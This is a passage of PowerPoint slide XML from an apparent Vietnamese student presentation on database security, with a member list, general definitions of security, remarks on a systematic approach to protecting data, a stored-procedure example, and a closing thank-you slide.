              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2500" i="0">
                <a:solidFill>
                  <a:srgbClr val="1B1B1B"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Thực thi lệnh Procedure với vai trò là ‘admin’ (được thực thi lệnh update trên bảng Employees) đã cài đặt từ trước </a:t>
            </a:r>
            <a:endParaRPr lang="vi-VN" sz="2500" i="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589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52600" y="5144530"/>
            <a:ext cx="12701386" cy="2769989"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:lnSpc>
                <a:spcPts val="10800"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="9000">
                <a:solidFill>
                  <a:srgbClr val="705E51"/>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Cảm ơn thầy và các bạn đã lắng nghe.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="304800" y="-2068688"/>
            <a:ext cx="17465828" cy="6986331"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="2540000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 5"/>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4062" b="-4062"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1028700" y="5457678"/>
            <a:ext cx="266700" cy="8220221"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="279400" cy="8531991"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="AutoShape 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-2880818" y="5492423"/>
              <a:ext cx="6041036" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="AutoShape 9"/>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3705" y="0"/>
            <a:ext cx="5143500" cy="10287000"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="3175000" cy="6350000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>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26063" r="-170507"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="15253096" y="1566066"/>
            <a:ext cx="2110979" cy="503878"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2814638" cy="671838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Freeform 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0"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121372" y="0"/>
              <a:ext cx="693266" cy="671838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693266" h="671838">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693266" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693266"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059807" y="0"/>
              <a:ext cx="693266" cy="671838"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="693266" h="671838">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="693265" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="693265" y="671838"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="671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8" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="17154525" y="5457679"/>
            <a:ext cx="209550" cy="6398994"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="279400" cy="8531991"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="AutoShape 9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-2880818" y="5492423"/>
              <a:ext cx="6041036" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="38100" cap="flat">
              <a:solidFill>
                <a:srgbClr val="30231A"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="AutoShape 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="-5400000">
              <a:off x="-1105778" y="1105778"/>
              <a:ext cx="2490955" cy="0"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="279400" cap="flat">
              <a:solidFill>
                <a:srgbClr val="9A6547"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:headEnd type="none" w="sm" len="sm"/>
              <a:tailEnd type="none" w="sm" len="sm"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057217" y="1228725"/>
            <a:ext cx="8115300" cy="2686056"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="10400" u="none">
                <a:solidFill>
                  <a:srgbClr val="9A6547"/>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Danh sách thành viên</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC40EE38-C7F9-0886-16BA-BEBB5E6800C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057216" y="4009877"/>
            <a:ext cx="8649383" cy="5334794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Nguyễn</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Đức</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Mạnh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950" algn="l">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Nguyễn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Thành</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Phát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – 21010471</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950" algn="l">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Châu</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Công</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Thoại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – 21009641</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="0" indent="-742950">
              <a:lnSpc>
                <a:spcPts val="10400"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Trần</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Tuấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" u="none" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t>Khang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Cabin Medium" panose="00000600000000000000"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3600" u="none" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Cabin Medium" panose="000006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57201" y="2400300"/>
            <a:ext cx="16802100" cy="6712434"/>
            <a:chOff x="0" y="73701"/>
            <a:chExt cx="3271246" cy="2164112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="3" name="Freeform 3"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="7370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4" name="TextBox 4"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="32561" y="134634"/>
              <a:ext cx="1987197" cy="1511364"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="254000" tIns="254000" rIns="254000" bIns="254000" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="vi-VN" sz="2600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Trong quá trình phát triển phần mềm, bảo mật thường được coi là một yếu tố phụ và ít khi được ưu tiên hàng đầu. Tuy nhiên, việc xử lý lỗ hổng bảo mật mà không có kế hoạch cụ thể có thể tốn nhiều thời gian hơn so với việc phát triển các chức năng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hệ</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phần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mềm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ứng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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr marL="457200" indent="-457200" algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
                <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:buChar char="•"/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="2600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>L</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="vi-VN" sz="2600" dirty="0">
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>ỗ hổng bảo mật có thể phụ thuộc vào cách mà hệ thống được triển khai. Điều này có nghĩa là trong một môi trường cụ thể, phần mềm có thể được coi là đáng tin cậy và an toàn, nhưng khi triển khai trong một môi trường khác, nó có thể trở nên không an toàn và dễ bị tấn công hơn.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10104444"/>
            <a:ext cx="18288000" cy="182556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F24300"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="808910"/>
            <a:ext cx="15544799" cy="78867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 Giới thiệu về cách tiếp cận bảo mật cơ sở dữ liệu</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E3E3EC2-8CA6-4298-5DAB-9A66446C16D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11550625" y="1597587"/>
            <a:ext cx="6737375" cy="6737347"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="6350000" cy="6349974"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freeform 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DA84286-A2E0-E852-62DB-F567418A461F}"/>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rimson Pro"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FD9F0-5190-B337-7614-7159E0C22B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2120E1-6349-7BB6-B88A-C26BA8863D0B}"/>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032DCE1D-D5FA-D169-51BE-72B3E7230914}"/>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CEB5D926-B3F4-E59B-A547-6D06FC315D41}"/>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03E7B162-095C-CB4D-04A7-F9BB91FD8AE1}"/>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1ADD7DFA-3EDE-E7F4-E401-EF52FADD973E}"/>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r>
                <a:rPr lang="vi-VN" sz="2400" b="1">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="+mj-lt"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>2.1 Bảo mật</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="just">
                <a:spcBef>
                  <a:spcPts val="600"/>
                </a:spcBef>
              </a:pPr>
              <a:endParaRPr lang="en-US" sz="24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3200" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="TextBox 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D2A80CE-B053-D19C-EB1A-846560B6C626}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1295400" y="3463694"/>
            <a:ext cx="12266762" cy="5093702"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khái niệm: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Bảo mật là quá trình hoặc tập hợp các biện pháp được thiết kế để bảo vệ thông tin quan trọng, hệ thống máy tính, dữ liệu, tài nguyên và các hoạt động trực tuyến khỏi các mối đe dọa, nguy cơ và rủi ro. Mục tiêu của bảo mật là đảm bảo tính toàn vẹn, sẵn sàng và bảo mật của thông tin, đồng thời ngăn chặn các cuộc tấn công, truy cập trái phép và sử dụng sai mục đích. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="250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vi-VN" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Khi xem xét</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>bảo mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> dữ liệu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>, nó đòi hỏi một cách tiếp cận có hệ thống phải bao gồm: nhân viên, bảo mật vật lý và kỹ thuật, bảo mật thủ tục kinh doanh, an ninh mạng (LAN và / hoặc WAN)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Đây là một cách tiếp cận rất chung về bảo mật, vì hầu hết mọi người đều xử lý các vấn đề bảo mật liên quan đến cấu hình tường lửa. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2500">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
              <a:ea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vi-VN" sz="2500">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mj-lt"/>
